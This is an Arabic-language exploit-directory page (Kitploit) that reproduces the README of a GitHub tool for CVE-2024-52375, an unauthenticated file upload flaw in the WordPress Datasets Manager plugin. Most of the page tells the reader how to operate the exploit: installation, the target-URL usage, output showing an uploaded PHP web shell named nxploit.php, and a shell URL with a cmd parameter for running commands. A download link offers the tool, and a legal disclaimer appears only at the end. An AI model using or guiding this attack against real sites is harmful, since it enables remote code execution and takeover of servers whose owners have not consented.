Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-52375 — إضافة WordPress Datasets Manager من Arttia Creative <= 1.5 - ثغرة رفع ملف تعسفي | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-52375
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2024-52375

CVE-2024-52375

إضافة WordPress Datasets Manager من Arttia Creative <= 1.5 - ثغرة رفع ملف تعسفي

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

WordPress Datasets Manager <= 1.5 - رفع ملفات تعسفي (CVE-2024-52375)

💥 الاستغلال بواسطة: Nxploit (Khaled Alenazi)
📅 تاريخ نشر CVE: 14 نوفمبر 2024
🧠 درجة CVSS: 10.0 (حرجة)
🛠 CWE-434: رفع ملف بدون قيود بنوع خطير


📌 الوصف

تم اكتشاف ثغرة أمنية خطيرة في إضافة ووردبريس Datasets Manager by Arttia Creative، وهي تؤثر على جميع الإصدارات حتى الإصدار 1.5 ضمناً.

تفشل الإضافة في التحقق من أنواع الملفات بشكل صحيح أثناء عملية الرفع، مما يسمح لمهاجم غير موثّق برفع ملفات عشوائية — بما في ذلك قذائف PHP — وتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE).


🧠 تفاصيل CVE

  • معرّف CVE: CVE-2024-52375
  • الإضافة المتأثرة: Datasets Manager by Arttia Creative
  • الإصدارات المتأثرة: <= 1.5
  • نوع الثغرة: رفع ملفات تعسفي (بدون مصادقة)
  • CWE: CWE-434 - رفع ملف بدون قيود بنوع خطير
  • CVSS v3.1: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
  • الخطورة: 🔴 حرجة (10.0)

⚙️ المتطلبات

  • Python 3.x
  • مكتبة requests:
    root@kitploit:~
    pip install requests
    

🚀 الاستخدام

root@kitploit:~

usage: CVE-2024-52375.py [-h] -u URL

Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi

options:
  -h, --help     show this help message and exit
  -u, --url URL  Full target URL (e.g. http://target.com/wordpress)

استبدل عنوان URL بالمسار الكامل لتثبيت ووردبريس المستهدف.


✅ المخرجات المتوقعة

في حال نجاح العملية، سيقوم السكربت بـ:

  1. استخراج قيمة _wpnonce العامة من الواجهة الأمامية.
  2. رفع قذيفة PHP باسم nxploit.php.
  3. التحقق من إمكانية الوصول إلى القذيفة وعرض رابطها:
root@kitploit:~
[+] Shell available at:
    http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php

يمكنك بعد ذلك تنفيذ أوامر مثل:

root@kitploit:~
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id

🔒 ملاحظات

  • يتحقق الاستغلال من إصدار الإضافة تلقائياً عبر readme.txt.
  • فقط الإصدارات <= 1.5 معرّضة للخطر.
  • لا يتطلب أي مصادقة.


📢 إخلاء المسؤولية

تُقدَّم هذه الأداة لأغراض تعليمية واختبارات مصرّح بها فقط.
استخدامها ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها يعتبر غير قانوني.

تنزيل الأداة